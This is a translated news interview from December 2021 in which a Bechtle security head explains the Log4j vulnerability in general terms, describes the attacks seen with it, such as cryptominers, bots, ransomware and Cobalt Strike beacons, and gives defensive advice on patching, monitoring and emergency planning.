IT expert warns: Huge wave of hacker attacks threatens this Christmas - "the criminals will take advantage of"

Created: 12/23/2021, 05:08 AM

From: Matthias Schneider

The vulnerability in the log4j file could provoke a huge wave of hacker attacks over Christmas.

Private users and companies can now protect themselves.

Munich - A security gap threatens millions of users.

Niklas Keller, head of IT security for Germany, Austria and Switzerland at the IT system provider Bechtle, explains to

how users can protect themselves from the effects of the so-called Log4j gap.

Niklas Keller, Bechtle Cyber ​​Security Head for Germany, Austria and Switzerland © Bechtle AG

The Log4j vulnerability caused a stir around the world.

In the meantime it has calmed down.

Has the subject been dealt with?

On the contrary, we assume that hackers are currently setting up sleeper programs to really get going on the holidays.

The computer programs of every second to third manufacturer are likely to be affected by this.

For example, the Belgian Ministry of Defense had to shut down parts of its network.

Basically, companies in particular are the target of strategic attacks.

However, private users can also be affected.

The Federal Office for Information Security has rightly declared the “red alert”.

This was last the case with the Microsoft Exchange gap in the spring.

How could it possibly come this far?

Log4j is an open source file with a logging function that is very widely used.

Due to its construction, however, it is unintentionally susceptible to so-called remote code execution.

This means that you send a certain string of characters to an application or website that uses the Log4j file.

Instead of posting this string as a normal log entry, it is executed as code.

This opens a door for hackers to break into the program.

The security gap has existed unnoticed since 2013.

How can this loophole be exploited?

Systems that can be reached via the Internet are primarily at risk.

However, systems behind a firewall that use the Log4j library can also be vulnerable if the attacker is already in the network.

Hackers use automated programs to search for systems that have this vulnerability.

Sending the specific character string to the affected system exploits the vulnerability and installs unwanted malware.

What can happen?

So far we have mainly identified attacks from cryptominers.

They tap into the computing power of systems to calculate crypto currencies such as Bitcoin.

Preparing for further attacks is far more dangerous.

Many criminals are currently using the vulnerability to place sleeper programs, such as so-called bots, in the attacked systems.

What can these programs do?

For example, they can steal information or hijack the system for a DDoS attack.

For this purpose, thousands of computers are taken over, which are constantly trying to access an online service, for example a website.

This is then blocked due to overload.

What else can happen?

Targeted hacker attacks on the system itself are more dangerous. On the one hand, these can be ransomware attacks.

The systems of those affected are encrypted and only made usable again for a ransom.

At the same time, the stolen data is usually threatened to be published on the Darknet.

Another scenario is the spread of so-called cobalt strike beacons.

Hackers can control the entire system remotely.

We have already observed the first attacks in this work in connection with the log4j vulnerability.

How can you protect yourself?

Unfortunately, a virus scanner is of no use here. However, the manufacturers are working flat out to close the gaps. However, this is only useful to users if they immediately install the available software updates. In addition, attention should be paid to whether there are unusual activities. Commercial users now also have to check where the security gaps exist in their software architecture, how they can be closed and whether the attackers are already in the system. That is also the job of an IT service provider: Identifying weak points, correcting them and - in the worst case - fending off attacks and forensically examining how far the attackers have come. To this end, we have been actively approaching our customers since the vulnerability became known. However, if there is a security hole that cannot be closed immediately,you have to consider taking the system offline because the risk of an attack is currently very high.

But right now, many IT experts are also going on Christmas vacation.

And that is what the criminals will take advantage of.

The attacks are started preferentially when nobody is in the company to discover their actions.

We expect that many attackers are currently waiting for the first smoke to clear in order to strike.

For companies that do not fix the gaps in good time, this can lead to high financial losses and, in case of doubt, also to an existential threat.

How can you protect yourself in the long term?

You can't just buy a technology and sit back.

Hundreds of vulnerabilities are discovered every week.

That's why you always need a contingency plan: How do I find out which gaps affect me?

Who is there immediately if there is an attack?

What will it cost me to take my system offline?

How do I restore it quickly?

Both self-employed people and large companies need such an emergency plan.

Read more about what drives the economy here.